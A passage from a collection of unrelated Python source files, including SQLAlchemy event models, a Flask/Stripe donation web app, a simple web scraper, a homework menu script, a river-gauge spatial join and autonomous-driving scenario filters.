self.type = int(datatype)
if attribute is not None:
setattr(self, attribute, value)
@value.deleter
def value(self):
self._set_value(None)
@value.comparator
class value(PropComparator):
"""A comparator for .value, builds a polymorphic comparison.
"""
def __init__(self, cls):
self.cls = cls
def __eq__(self, other):
dtype, value = self.cls.get_type_value(other)
if dtype is None:
dtype = Datatype.string
if dtype == Datatype.none:
return self.cls.type == int(Datatype.none)
attr = getattr(self.cls, self.cls.ATTRIBUTE_MAP[dtype])
return and_(attr == value, self.cls.type == int(dtype))
def __ne__(self, other):
dtype, value = self.cls.get_type_value(other)
if dtype is None:
dtype = Datatype.string
if dtype == Datatype.none:
return self.cls.type != int(Datatype.none)
attr = getattr(self.cls, self.cls.ATTRIBUTE_MAP[dtype])
return and_(attr != value, self.cls.type == int(dtype))
def __repr__(self):
return '<%s %r=%r>' % (self.__class__.__name__, self.name, self.value)
Base = declarative_base()
class Trait(PolymorphicVerticalProperty, Base):
__tablename__ = 'trait'
__table_args__ = (
Index('ix_trait_t_int', 't_int'),
Index('ix_trait_t_string', 't_string'),
Index('ix_trait_t_datetime', 't_datetime'),
Index('ix_trait_t_float', 't_float'),
)
event_id = Column(Integer, ForeignKey('event.id'), primary_key=True)
name = Column(String(100), primary_key=True)
type = Column(Integer)
ATTRIBUTE_MAP = {Datatype.none: None,
Datatype.string: 't_string',
Datatype.int: 't_int',
Datatype.float: 't_float',
Datatype.datetime: 't_datetime',}
t_string = Column(String(255), nullable=True, default=None)
t_float = Column(Float, nullable=True, default=None)
t_int = Column(Integer, nullable=True, default=None)
t_datetime = Column(PreciseTimestamp(),
nullable=True, default=None)
def __repr__(self):
return "<Trait(%s) %s=%s/%s/%s/%s on %s>" % (self.name,
self.type,
self.t_string,
self.t_float,
self.t_int,
self.t_datetime,
self.event_id)
class EventType(Base):
"""Types of event records."""
__tablename__ = 'event_type'
id = Column(Integer, primary_key=True)
desc = Column(String(255), unique=True)
def __init__(self, event_type):
self.desc = event_type
def __repr__(self):
return "<EventType: %s>" % self.desc
class Event(ProxiedDictMixin, Base):
__tablename__ = 'event'
__table_args__ = (
Index('ix_event_message_id', 'message_id'),
Index('ix_event_type_id', 'event_type_id'),
Index('ix_event_generated', 'generated')
)
id = Column(Integer, primary_key=True)
message_id = Column(String(50), unique=True)
generated = Column(PreciseTimestamp())
event_type_id = Column(Integer, ForeignKey('event_type.id'))
event_type = relationship("EventType", backref=backref('event_type'))
traits = relationship("Trait",
collection_class=attribute_mapped_collection('name'))
_proxied = association_proxy("traits", "value",
creator=lambda name, value: Trait(name=name, value=value))
@property
def event_type_string(self):
return self.event_type.desc
@property
def as_dict(self):
d = dict(self._proxied)
d['message_id'] = self.message_id
d['event_type'] = self.event_type_string
d['timestamp'] = self.generated
return d
def __init__(self, message_id, event_type, generated):
self.message_id = message_id
self.event_type = event_type
self.generated = generated
def __repr__(self):
return "<Event %s ('Event : %s %s, Generated: %s')>" % (self.id,
self.message_id,
self.event_type,
self.generated)
stream_event_table = Table('streamevent', Base.metadata,
Column('stream_id', Integer, ForeignKey('stream.id'), primary_key=True),
Column('event_id', Integer,
ForeignKey('event.id'),
primary_key=True)
)
class Stream(ProxiedDictMixin, Base):
__tablename__ = 'stream'
__table_args__ = (
Index('ix_stream_name', 'name'),
Index('ix_stream_state', 'state'),
Index('ix_stream_expire_timestamp', 'expire_timestamp'),
Index('ix_stream_fire_timestamp', 'fire_timestamp')
)
id = Column(Integer, primary_key=True)
first_event = Column(PreciseTimestamp(), nullable=False)
last_event = Column(PreciseTimestamp(), nullable=False)
expire_timestamp = Column(PreciseTimestamp())
fire_timestamp = Column(PreciseTimestamp())
name = Column(String(255), nullable=False)
state = Column(Integer, default=StreamState.active, nullable=False)
state_serial_no = Column(Integer, default=0, nullable=False)
distinguished_by = relationship("DistinguishingTrait",
cascade="save-update, merge, delete, delete-orphan",
collection_class=attribute_mapped_collection('name'))
_proxied = association_proxy("distinguished_by", "value",
creator=lambda name, value: DistinguishingTrait(name=name, value=value))
events = relationship(Event, secondary=stream_event_table,
order_by=Event.generated)
@property
def distinguished_by_dict(self):
return dict(self._proxied)
def __init__(self, name, first_event, last_event=None, expire_timestamp=None,
fire_timestamp=None, state=None, state_serial_no=None):
self.name = name
self.first_event = first_event
if last_event is None:
last_event = first_event
self.last_event = last_event
self.expire_timestamp = expire_timestamp
self.fire_timestamp = fire_timestamp
if state is None:
state = StreamState.active
self.state = int(state)
if state_serial_no is None:
state_serial_no = 0
self.state_serial_no = state_serial_no
class DistinguishingTrait(PolymorphicVerticalProperty, Base):
__tablename__ = 'dist_trait'
__table_args__ = (
Index('ix_dist_trait_dt_int', 'dt_int'),
Index('ix_dist_trait_dt_float', 'dt_float'),
Index('ix_dist_trait_dt_string', 'dt_string'),
Index('ix_dist_trait_dt_datetime', 'dt_datetime'),
Index('ix_dist_trait_dt_timerange_begin', 'dt_timerange_begin'),
Index('ix_dist_trait_dt_timerange_end', 'dt_timerange_end'),
)
stream_id = Column(Integer, ForeignKey('stream.id'), primary_key=True)
name = Column(String(100), primary_key=True)
type = Column(Integer)
ATTRIBUTE_MAP = {Datatype.none: None,
Datatype.string: 'dt_string',
Datatype.int: 'dt_int',
Datatype.float: 'dt_float',
Datatype.datetime: 'dt_datetime',
Datatype.timerange:'dt_timerange',
}
dt_string = Column(String(255), nullable=True, default=None)
dt_float = Column(Float, nullable=True, default=None)
dt_int = Column(Integer, nullable=True, default=None)
dt_datetime = Column(PreciseTimestamp(),
nullable=True, default=None)
dt_timerange_begin = Column(PreciseTimestamp(), nullable=True, default=None)
dt_timerange_end = Column(PreciseTimestamp(), nullable=True, default=None)
dt_timerange = composite(DBTimeRange, dt_timerange_begin, dt_timerange_end)
@property
def as_dict(self):
return {self.name: self.value}
def __repr__(self):
return "<DistinguishingTrait(%s) %s=%s/%s/%s/%s/(%s to %s) on %s>" % (self.name,
self.type,
self.dt_string,
self.dt_float,
self.dt_int,
self.dt_datetime,
self.dt_timerange_begin,
self.dt_timerange_end,
self.stream_id)
| python |
from Step_5.A3C import A3Cagent
from Step_5.Parameter import PARA
from Step_5.A3C_NETWORK import A3C_shared_network
class MainModel:
def __init__(self):
self.worker = []
shared_model = A3C_shared_network().model
for i in range(0, 2):
self.worker.append(A3Cagent(Remote_ip=PARA.Remote_ip,
Remote_port=PARA.Remote_port + i,
CNS_ip=PARA.CNS_ip,
CNS_port=PARA.CNS_port + i,
Shared_net=shared_model
))
        # start the worker processes
        jobs = []
for __ in self.worker:
__.start()
if __name__ == '__main__':
    test = MainModel()
| python |
import profig
from gogetmarvel.comic import Comic
from gogetmarvel.engine import Engine
cfg = profig.Config('gogetmarvel/config.cfg')
cfg.sync()
class Marvel(object):
"""
Main marvel object connects the engine to its children.
"""
def __init__(self, private_key=None, public_key=None):
"""
Entry point of the marvel class.
Requires the API key and secret provided by marvel
developer.
"""
if not private_key or not public_key:
self.public_key = cfg['auth.public_key']
self.private_key = cfg['auth.private_key']
else:
self.public_key = public_key
self.private_key = private_key
self.engine = Engine(self.public_key, self.private_key)
self.query_comic = Comic(self.engine)
| python |
#!/usr/bin/env python
#coding:utf-8
import requests
import re
#The next three lines handle encoding conversion; no need to worry about them for now.
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
#header is a dictionary we build ourselves; it stores the user-agent
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'}
#Some sites filter out crawler programs, so the crawler includes browser headers to disguise itself as a browser
# html = requests.get('http://jp.tingroom.com/yuedu/yd300p/')
html = requests.get('http://jp.tingroom.com/yuedu/yd300p/',headers = header)
html.encoding = 'utf-8' #this line converts the encoding to utf-8; otherwise Chinese text is displayed as garbage
# print html.text
# title = re.findall('color:#666666;">(.*?)</span>',html.text,re.S)
# for each in title:
# print each
#
chinese = re.findall('color: #039;">(.*?)</a>',html.text,re.S)
for each in chinese:
    print each
| python |
import repetition
menu_selex = 'y'
while menu_selex == 'y': #This is so that HW Menu is generated
print('\nHomework 3 Menu\n1-Factorial\n2-Sum odd numbers\n3-Exit')
selex = int(input('Please select menu item 1, 2 or 3: '))
if selex == 1: #This is the factorial part of the assignment
keep_factoring = 'y'
while keep_factoring == 'y':
num = int(input('To calculate the factorial, please enter a whole number greater than 0 but less than 10: '))
if num <= 0 or num >= 10:
print('Number entered is outside of specified range. Please enter another number in the correct range.')
num = int(input('To calculate the factorial, please enter a whole number greater than 0 but less than 10: '))
else:
factorial = repetition.get_factorial(num)
print('The factorial for', num,'is', format(factorial, ','))
keep_factoring = input('Do you want to calculate another factorial (Enter y for yes, n for no): ')
elif selex == 2: #This is the sum of odd numbers part of the assignment
keep_summing = 'y'
while keep_summing =='y':
num2 = int(input('To get sum of odd numbers, please enter a whole number greater than zero but less than 100: '))
if num2 <= 0 or num2 >= 100:
                print('Number entered is outside of specified range. Please enter another number in the correct range.')
num2 = int(input('To get sum of odd numbers, please enter a whole number greater than zero but less than 100: '))
else:
total_odds = repetition.sum_odd_numbers(num2)
print('The sum of all odd numbers up to', num2, 'is', format(total_odds, ','))
keep_summing = input('Do you want to calculate the sum of odd numbers again (Enter y for yes, n for no): ')
elif selex == 3: #This is the exit from the menu part of the assignment
print('You have chosen to exit.')
else:
print("Invalid entry")
menu_selex = input('Do you want to continue with another menu selection (Enter y for yes, n to exit from Homework 3 Menu): ')
| python |
import os
import re
import sys
import time
import traceback
import logging
import hashlib
from urllib.parse import urlsplit, urlunsplit
from datetime import datetime
from dateutil import tz
from flask import (
Flask,
render_template,
request,
redirect,
url_for,
send_from_directory,
jsonify,
abort,
)
from werkzeug.middleware.proxy_fix import ProxyFix
import stripe
import sendgrid
from jsonschema import validate
from parse_cents import parse_cents
from python_http_client import exceptions
from applicationinsights.flask.ext import AppInsights
try:
if "WEBSITE_SITE_NAME" in os.environ:
os.environ["GIT_VERSION"] = open(
"../repository/.git/refs/heads/master", "r"
).read()
except OSError:
pass
TEST_ENVIRONMENT = os.path.basename(sys.argv[0]) == "pytest"
REDIRECT_TO_WWW = os.environ.get("REDIRECT_TO_WWW") != "false"
def require_env(k: str) -> str:
v = os.environ.get(k)
if v is None:
if TEST_ENVIRONMENT:
return f"TEST_{k}"
else:
raise KeyError(f"Missing required environment variable {k}")
return v
RECEIPT_TEMPLATE_ID = "d-7e5e6a89f9284d2ab01d6c1e27a180f8"
FAILURE_TEMPLATE_ID = "d-570b4b8b20e74ec5a9c55be7e07e2665"
SENDGRID_API_KEY = require_env("SENDGRID_API_KEY")
DONATE_EMAIL = "[email protected]"
MONTHLY_PLAN_ID = "mb-monthly-001"
LOCAL_TZ = tz.gettz("America/Los_Angeles")
stripe_keys = {
"secret_key": require_env("SECRET_KEY"),
"publishable_key": require_env("PUBLISHABLE_KEY"),
"endpoint_secret": require_env("WEBHOOK_SIGNING_SECRET"),
}
stripe.api_key = stripe_keys["secret_key"]
CANONICAL_HOSTS = os.environ.get("CANONICAL_HOST", "").split()
CHECKOUT_SCHEMA = {
"type": "object",
"description": "Start the Stripe checkout flow",
"required": ["amount"],
"properties": {
"amount": {
"type": "integer",
"description": "USD cents of donation",
"minimum": 100,
},
"metadata": {"type": "object"},
},
}
def verizonProxyHostFixer(app):
"""Azure's Verizon Premium CDN uses the header X-Host instead of X-Forwarded-Host
"""
def proxy_fixed_app(environ, start_response):
x_host = environ.get("HTTP_X_HOST")
if x_host in CANONICAL_HOSTS:
environ["HTTP_X_FORWARDED_HOST"] = x_host
return app(environ, start_response)
return proxy_fixed_app
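# Illustrative note (not from the source): when the CDN forwards a request with
# an "X-Host" header that matches one of CANONICAL_HOSTS, the fixer copies it
# into "X-Forwarded-Host" so ProxyFix (and url_for/redirects) build URLs for
# the canonical external host rather than the origin server's host.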
app = Flask(__name__)
appinsights = AppInsights(app)
if CANONICAL_HOSTS:
# Azure's Verizon Premium CDN uses the header X-Host instead of X-Forwarded-Host
app.wsgi_app = verizonProxyHostFixer(ProxyFix(app.wsgi_app, x_host=1))
streamHandler = logging.StreamHandler()
app.logger.addHandler(streamHandler)
app.logger.setLevel(logging.DEBUG)
def get_telemetry_client():
requests_middleware = appinsights._requests_middleware
return requests_middleware.client if requests_middleware else None
def set_default_app_context():
requests_middleware = appinsights._requests_middleware
if requests_middleware:
envs = ["WEBSITE_SITE_NAME", "GIT_VERSION"]
for k in envs:
v = os.environ.get(k)
if v:
requests_middleware._common_properties[k] = v
set_default_app_context()
def merge_dicts(*dicts):
rval = {}
for d in dicts:
if d:
rval.update(d)
return rval
@app.template_filter("asset_url")
def asset_url(path, CACHE={}):
abspath = os.path.abspath(app.root_path + path)
# Avoid directory traversal mistakes
if not abspath.startswith(app.static_folder):
return path
try:
# Check that the file exists and use its
# size and creation time as a cache key to avoid
# computing a digest on every request
stat = os.stat(abspath)
key = stat.st_size, stat.st_mtime
cached = CACHE.get(path)
if cached is not None and cached[0] == key:
return cached[1]
# Get a SHA1 digest of the file contents
h = hashlib.sha1()
with open(abspath, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
h.update(chunk)
# Use the prefix of the digest in the URL to ensure
# the browser will receive the latest version
rval = "{}?v={}".format(path, h.hexdigest()[:8])
CACHE[path] = (key, rval)
return rval
except OSError:
# This will catch any FileNotFoundError or similar
# issues with stat, open, or read.
return path
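# Example of the resulting URL shape (illustrative values): "/static/app.css"
# would be served as "/static/app.css?v=3b2c1a9f", where the suffix is the
# first 8 hex digits of the file's SHA-1 digest, so clients re-fetch the asset
# whenever its contents change.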
@app.after_request
def add_cache_control_header(response):
"""Disable caching for non-static endpoints
"""
if "Cache-Control" not in response.headers:
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
return response
@app.route("/favicon.ico")
def favicon():
return send_from_directory(
os.path.join(app.root_path, "static"),
"favicon.ico",
mimetype="image/vnd.microsoft.icon",
)
@app.route("/robots.txt")
def robots():
return send_from_directory(
os.path.join(app.root_path, "static"), "robots.txt", mimetype="text/plain"
)
@app.route("/.well-known/apple-developer-merchantid-domain-association")
def apple_pay_domain_association():
return send_from_directory(
os.path.join(app.root_path, "static"),
"apple-developer-merchantid-domain-association",
mimetype="text/plain",
)
def format_identifier(s):
"""
>>> format_identifier('apple_pay')
'Apple Pay'
"""
return " ".join(map(lambda s: s.capitalize(), s.split("_")))
CARD_BRANDS = {
"amex": "American Express",
"diners": "Diners Club",
"discover": "Discover",
"jcb": "JCB",
"mastercard": "Mastercard",
"unionpay": "UnionPay",
"visa": "Visa",
}
def format_payment_method_details_source(payment_method_details):
payment_type = payment_method_details.type
if payment_type in ("card", "card_present"):
details = payment_method_details[payment_type]
parts = []
brand = CARD_BRANDS.get(details.brand)
if brand:
parts.append(brand)
if details.funding != "unknown":
parts.append(details.funding)
parts.append("card")
if details.wallet:
parts.append("({})".format(format_identifier(details.wallet.type)))
return " ".join(parts)
else:
return format_identifier(payment_type)
def sendgrid_safe_name(name):
"""The to.name, cc.name, and bcc.name personalizations cannot include either the ; or , characters.
"""
return re.sub(r"([,;]\s*)+", " ", name)
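# Hedged example (not in the source): runs of commas/semicolons collapse to a
# single space, e.g. sendgrid_safe_name("Doe, Jane; PhD") == "Doe Jane PhD".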
@app.route("/cancel")
def cancel():
return render_template("cancel.html", donate_email=DONATE_EMAIL)
@app.route("/success")
def success():
session_id = request.args.get("session_id")
if not session_id:
return redirect("/")
session = stripe.checkout.Session.retrieve(
session_id, expand=["payment_intent", "subscription.default_payment_method"]
)
return render_template(
"success.html", donate_email=DONATE_EMAIL, **session_info(session)
)
def session_info(session):
if session.mode == "subscription":
subscription = session.subscription
pm = subscription.default_payment_method
return merge_dicts(
{
"id": subscription.id,
"frequency": "monthly",
"amount": subscription.plan.amount * subscription.quantity,
"payment_method": format_payment_method_details_source(pm),
},
billing_details_to(pm.billing_details),
)
elif session.mode == "payment":
charge = session.payment_intent.charges.data[0]
return merge_dicts(
{
"id": charge.id,
"frequency": "one-time",
"amount": charge.amount,
"payment_method": format_payment_method_details_source(
charge.payment_method_details
),
},
billing_details_to(charge.billing_details),
)
else:
raise NotImplementedError
def session_kw(amount, frequency, metadata):
if frequency == "monthly":
return {
"mode": "subscription",
"subscription_data": {
"items": [{"plan": MONTHLY_PLAN_ID, "quantity": amount}],
"metadata": metadata,
},
}
else:
return {
"mode": "payment",
"line_items": [
{
"amount": amount,
"currency": "USD",
"name": "One-time donation",
"quantity": 1,
}
],
"submit_type": "donate",
"payment_intent_data": {"description": "Donation", "metadata": metadata},
}
@app.route("/checkout", methods=["POST"])
def checkout():
body = request.json
validate(body, CHECKOUT_SCHEMA)
amount = body["amount"]
frequency = body["frequency"]
o = urlsplit(request.url)
metadata = merge_dicts(
body.get("metadata", {}),
{"origin": urlunsplit((o.scheme, o.netloc, "", "", ""))},
)
session = stripe.checkout.Session.create(
payment_method_types=["card"],
success_url=urlunsplit(
(o.scheme, o.netloc, "/success", "session_id={CHECKOUT_SESSION_ID}", "")
),
cancel_url=urlunsplit((o.scheme, o.netloc, "/cancel", "", "")),
**session_kw(amount=amount, frequency=frequency, metadata=metadata),
)
return jsonify(sessionId=session.id)
def billing_details_to(billing_details):
return {
"name": sendgrid_safe_name(billing_details.name),
"email": billing_details.email,
}
def donor_name(billing_details):
if billing_details.name:
return f"{billing_details.name} <{billing_details.email}>"
else:
return billing_details.email
def stripe_checkout_session_completed(session):
# Subscription receipts are handled by invoice payments
if session.mode == "payment":
return stripe_checkout_session_completed_payment(
stripe.checkout.Session.retrieve(session.id, expand=["payment_intent"])
)
def get_origin(metadata):
return metadata.get(
"origin",
f"https://{CANONICAL_HOSTS[0]}" if CANONICAL_HOSTS else "http://localhost:5000",
)
def stripe_invoice_payment_succeeded(invoice):
invoice = stripe.Invoice.retrieve(
invoice.id, expand=["subscription", "payment_intent"]
)
subscription = invoice.subscription
charge = invoice.payment_intent.charges.data[0]
if is_from_new_app(subscription.metadata):
print(f"Skipping subscription email from new app: {charge.id}")
return
next_dt = datetime.fromtimestamp(subscription.current_period_end, LOCAL_TZ)
sg = sendgrid.SendGridAPIClient(SENDGRID_API_KEY)
try:
response = sg.send(
email_template_data(
template_id=RECEIPT_TEMPLATE_ID,
charge=charge,
frequency="monthly",
monthly={
"next": f"{next_dt.strftime('%b')} {next_dt.day}, {next_dt.year}",
"url": f"{get_origin(subscription.metadata)}/subscriptions/{subscription.id}",
},
)
)
if not (200 <= response.status_code < 300):
return abort(400)
except exceptions.BadRequestsError:
return abort(400)
track_donation(metadata=subscription.metadata, frequency="monthly", charge=charge)
def email_template_data(template_id, charge, frequency, **kw):
payment_method = format_payment_method_details_source(charge.payment_method_details)
return {
"template_id": template_id,
"from": {"name": "Mission Bit", "email": DONATE_EMAIL},
"personalizations": [
{
"to": [billing_details_to(charge.billing_details)],
"dynamic_template_data": merge_dicts(
{
"transaction_id": charge.id,
"frequency": frequency,
"total": "${:,.2f}".format(charge.amount * 0.01),
"date": datetime.fromtimestamp(
charge.created, LOCAL_TZ
).strftime("%x"),
"payment_method": payment_method,
"donor": donor_name(charge.billing_details),
},
kw,
),
}
],
}
def track_invoice_failure(metadata, frequency, charge):
client = get_telemetry_client()
if client is None:
return
payment_method = format_payment_method_details_source(charge.payment_method_details)
client.track_event(
"DonationFailed",
merge_dicts(
metadata,
billing_details_to(charge.billing_details),
{"id": charge.id, "frequency": frequency, "payment_method": payment_method},
),
{"amount": charge.amount},
)
def track_donation(metadata, frequency, charge):
client = get_telemetry_client()
if client is None:
return
payment_method = format_payment_method_details_source(charge.payment_method_details)
client.track_event(
"Donation",
merge_dicts(
metadata,
billing_details_to(charge.billing_details),
{"id": charge.id, "frequency": frequency, "payment_method": payment_method},
),
{"amount": charge.amount},
)
def stripe_checkout_session_completed_payment(session):
payment_intent = session.payment_intent
charge = payment_intent.charges.data[0]
payment_method = format_payment_method_details_source(charge.payment_method_details)
if is_from_new_app(payment_intent.metadata):
print(f"Skipping charge email from new app: {charge.id}")
return
sg = sendgrid.SendGridAPIClient(SENDGRID_API_KEY)
try:
response = sg.send(
email_template_data(
template_id=RECEIPT_TEMPLATE_ID, charge=charge, frequency="one-time"
)
)
if not (200 <= response.status_code < 300):
print(repr(response))
return abort(400)
except exceptions.BadRequestsError:
traceback.print_tb(sys.last_traceback)
return abort(400)
track_donation(
metadata=payment_intent.metadata, frequency="one-time", charge=charge
)
def stripe_invoice_payment_failed(invoice):
invoice = stripe.Invoice.retrieve(
invoice.id, expand=["subscription", "payment_intent"]
)
if invoice.billing_reason != "subscription_cycle":
# No email unless it's a renewal, they got an error in the
# Stripe Checkout UX for new subscriptions.
return
subscription = invoice.subscription
charge = invoice.payment_intent.charges.data[0]
if is_from_new_app(subscription.metadata):
print(f"Skipping subscription failure email from new app: {charge.id}")
return
sg = sendgrid.SendGridAPIClient(SENDGRID_API_KEY)
origin = get_origin(subscription.metadata)
try:
response = sg.send(
email_template_data(
template_id=FAILURE_TEMPLATE_ID,
charge=charge,
frequency="monthly",
failure_message=charge.failure_message,
renew_url=f"{origin}/{'${:,.2f}'.format(charge.amount * 0.01)}/?frequency=monthly",
subscription_id=subscription.id,
subscription_url=f"{origin}/subscriptions/{subscription.id}",
)
)
if not (200 <= response.status_code < 300):
return abort(400)
except exceptions.BadRequestsError:
return abort(400)
# Cancel the subscription to avoid future charges
if subscription.status != "canceled":
stripe.Subscription.delete(subscription.id)
track_invoice_failure(
metadata=subscription.metadata, frequency="monthly", charge=charge
)
def is_from_new_app(metadata):
"""Events created by the new www.missionbit.org donation portal should be ignored
"""
return metadata.get("app") == "www.missionbit.org"
@app.route("/hooks", methods=["POST"])
def stripe_webhook():
payload = request.data.decode("utf-8")
sig_header = request.headers.get("Stripe-Signature", None)
event = None
try:
event = stripe.Webhook.construct_event(
payload=payload,
sig_header=sig_header,
secret=stripe_keys["endpoint_secret"],
)
except ValueError as e:
# Invalid payload
print("Invalid hook payload")
return "Invalid payload", 400
except stripe.error.SignatureVerificationError as e:
# Invalid signature
print("Invalid hook signature")
return "Invalid signature", 400
handlers = {
"checkout.session.completed": stripe_checkout_session_completed,
"invoice.payment_succeeded": stripe_invoice_payment_succeeded,
"invoice.payment_failed": stripe_invoice_payment_failed,
}
handler = handlers.get(event["type"])
if handler is not None:
obj = event["data"]["object"]
print(f"handling {event['type']} id: {obj.id}")
handler(obj)
else:
print(f"{event['type']} not handled")
return jsonify({"status": "success"})
def host_default_amount(host):
if host.startswith("gala."):
return "$250"
else:
return "$50"
@app.route("/subscriptions/<subscription_id>")
def subscription(subscription_id):
if REDIRECT_TO_WWW:
return redirect(f"https://www.missionbit.org/donate/subscriptions/{subscription_id}")
try:
subscription = stripe.Subscription.retrieve(
subscription_id, expand=["default_payment_method"]
)
except stripe.error.InvalidRequestError:
return redirect("/")
pm = subscription.default_payment_method
next_dt = datetime.fromtimestamp(subscription.current_period_end, LOCAL_TZ)
return render_template(
"subscription.html",
donate_email=DONATE_EMAIL,
subscription=subscription,
id=subscription.id,
frequency="monthly",
amount=subscription.plan.amount * subscription.quantity,
payment_method=format_payment_method_details_source(pm),
next_cycle=f"{next_dt.strftime('%b')} {next_dt.day}, {next_dt.year}",
**billing_details_to(pm.billing_details),
)
@app.route("/subscriptions/<subscription_id>", methods=["POST"])
def delete_subscription(subscription_id):
try:
stripe.Subscription.delete(subscription_id)
except stripe.error.InvalidRequestError:
return redirect(f"/subscriptions/{subscription_id}")
return redirect(f"/subscriptions/{subscription_id}")
@app.route("/")
@app.route("/<dollars>")
@app.route("/<dollars>/")
def index(dollars=""):
if REDIRECT_TO_WWW:
return redirect("https://www.missionbit.org/donate")
host = urlsplit(request.url).netloc
frequency = (
"monthly" if request.args.get("frequency", "once") == "monthly" else "once"
)
amount = parse_cents(dollars) or parse_cents(host_default_amount(host))
return render_template(
"index.html",
key=stripe_keys["publishable_key"],
metadata=merge_dicts(request.args, {"host": host}),
frequency=frequency,
formatted_dollar_amount="{:.2f}".format(amount * 0.01)
if amount % 100
else f"{amount // 100}",
)
if CANONICAL_HOSTS:
@app.before_request
def redirect_to_cdn():
o = urlsplit(request.url)
redirect_host = CANONICAL_HOSTS[0]
if o.netloc in CANONICAL_HOSTS:
if o.scheme == "https":
return None
else:
redirect_host = o.netloc
url = urlunsplit(("https", redirect_host, o[2], o[3], o[4]))
return redirect(url, code=302)
if __name__ == "__main__":
app.run(debug=True)
| python |
# Assessing placement bias of the global river gauge network
# Nature Sustainability
# Authors: Corey A. Krabbenhoft, George H. Allen, Peirong Lin, Sarah E. Godsey, Daniel C. Allen, Ryan M. Burrows, Amanda G. DelVecchia, Ken M. Fritz, Margaret Shanafield
# Amy J. Burgin, Margaret Zimmer, Thibault Datry, Walter K. Dodds, C. Nathan Jones, Meryl C. Mims, Catherin Franklin, John C. Hammond, Samuel C. Zipper, Adam S. Ward,
# Katie H. Costigan, Hylke E. Beck, and Julian D. Olden
# Date: 2/7/2022
# This code reads all gauge locations and spatially joins them with GRADES river segments
# output is the joined table of gauge ID (stationid) with GRADES river ID (COMID)
#required library
import geopandas as gpd
import pandas as pd
from shapely.geometry import Point
def find_nearest_river(dfpp,dfll,buffersize):
'''
This function finds the nearest river reach ID for each gauge
input: dfpp: point shapefile of the gauges; dfll: line shapefile of GRADES
'''
#create buffer
print(' create buffer... wait ...')
poly = dfpp.buffer(buffersize)
polygpd = gpd.GeoDataFrame(dfpp[['stationid', 'lon', 'lat']],geometry=poly)
#spatial join
print(' spatial join with flowlines.. wait ...')
join = gpd.sjoin(polygpd,dfll,how='inner',op='intersects')
merge=join.merge(dfll,on='COMID',how='left')
print(' calculating distance.. wait ...')
merge['distance']=[Point(merge['lon'][i],merge['lat'][i]).distance(merge['geometry_y'][i]) for i in range(0,len(merge))]
join11 = merge.groupby(['stationid']).agg({'distance':'min'}).reset_index() #min dist: width and MERIT
merge11 = join11.merge(merge,on=['stationid','distance'],how='left')
final = merge11[['stationid','COMID','distance','lon','lat']]
return final
if __name__ == '__main__':
#read latlon of all gauges (this is a combined gauge location database of GSIM and Beck at al)
df = pd.read_csv('New_gauge_list_revisions.csv')[['stationid','lat','lon','source']]
points = [Point(df.lon[j],df.lat[j]) for j in range(len(df))]
#create GeoDataFrame
dfpp = gpd.GeoDataFrame(df,geometry=points)
#read GRADES river segments and perform spatial join
buffersize = 0.05 #~5km
allpoints = []
for pfaf in range(1,9):
#GRADES river segment downloadable from http://hydrology.princeton.edu/data/mpan/MERIT_Basins/MERIT_Hydro_v07_Basins_v01/pfaf_level_01/
fin = '~/XXX/riv_pfaf_%01d_MERIT_Hydro_v07_Basins_v01.shp'%pfaf
print('... intersecting with %s ...'%fin)
dfll = gpd.read_file(fin)
allpoints.append(find_nearest_river(dfpp,dfll,buffersize))
allpoints = pd.concat(allpoints)
#save to file
fon = 'stationid_GRADES_v07_join.csv'
print('... writing to %s ...'%fon)
allpoints.to_csv(fon,index=False)
| python |
from __future__ import annotations
import logging
import random
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple, Union
from nuplan.common.actor_state.vehicle_parameters import VehicleParameters
from nuplan.database.nuplan_db.lidar_pc import LidarPc
from nuplan.database.nuplan_db.nuplandb import NuPlanDB
from nuplan.database.nuplan_db.nuplandb_wrapper import NuPlanDBWrapper
from nuplan.database.nuplan_db.scene import Scene
from nuplan.planning.scenario_builder.nuplan_db.nuplan_scenario import NuPlanScenario
from nuplan.planning.scenario_builder.nuplan_db.nuplan_scenario_utils import (
DEFAULT_SCENARIO_NAME,
ScenarioExtractionInfo,
ScenarioMapping,
)
from nuplan.planning.simulation.trajectory.trajectory_sampling import TrajectorySampling
from nuplan.planning.utils.multithreading.worker_utils import WorkerPool, worker_map
logger = logging.getLogger(__name__)
# Dictionary that holds a list of scenarios for each scenario type
ScenarioDict = Dict[str, List[NuPlanScenario]]
# Scene indices smaller than the first valid index or larger than the last valid index are dropped during filtering.
# This is done to ensure that all selected scenes have at least 20s of history/future samples.
FIRST_VALID_SCENE_IDX = 2 # First scene in a log that is considered valid for training/simulation
LAST_VALID_SCENE_IDX = -2 # Last scene in a log that is considered valid for training/simulation
@dataclass(frozen=True)
class FilterWrapper:
"""
Generic filter wrapper that encapsulates the filter's function and metadata.
"""
fn: Callable[[ScenarioDict], ScenarioDict] # function that filters the scenario dictionary
enable: bool # whether to run this filter
name: str # name of the filter
def run(self, scenario_dict: ScenarioDict) -> ScenarioDict:
"""
Run the filter if enabled.
:param scenario_dict: Input scenario dictionary.
:return: Output scenario dictionary.
"""
if not self.enable:
return scenario_dict
logger.debug(f'Running scenario filter {self.name}...')
scenario_dict = self.fn(scenario_dict) # type: ignore
logger.debug(f'Running scenario filter {self.name}...DONE')
return scenario_dict
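# Illustrative sketch of how FilterWrapper instances might be chained
# (hypothetical usage; the wrapper names below are only examples):
#   wrappers = [
#       FilterWrapper(fn=lambda d: filter_by_log_names(d, ["log_a"]), enable=True, name="log_names"),
#       FilterWrapper(fn=lambda d: filter_num_scenarios_per_type(d, 10, randomize=False), enable=True, name="per_type"),
#   ]
#   for wrapper in wrappers:
#       scenario_dict = wrapper.run(scenario_dict)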
def is_scene_valid(
scene: Scene, first_valid_idx: int = FIRST_VALID_SCENE_IDX, last_valid_idx: int = LAST_VALID_SCENE_IDX
) -> bool:
"""
Check whether the scene has enough history/future buffer and is valid for training/simulation.
:param scene: Candidate scene.
:param first_valid_idx: Index of first valid scene.
:param last_valid_idx: Index of last valid scene.
:return: Whether the scene is valid or not.
"""
scenes = scene.log.scenes
scene_idx = int(scenes.index(scene))
return first_valid_idx <= scene_idx < len(scenes) + last_valid_idx
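# For example, a log with 10 scenes and the defaults FIRST_VALID_SCENE_IDX=2 and
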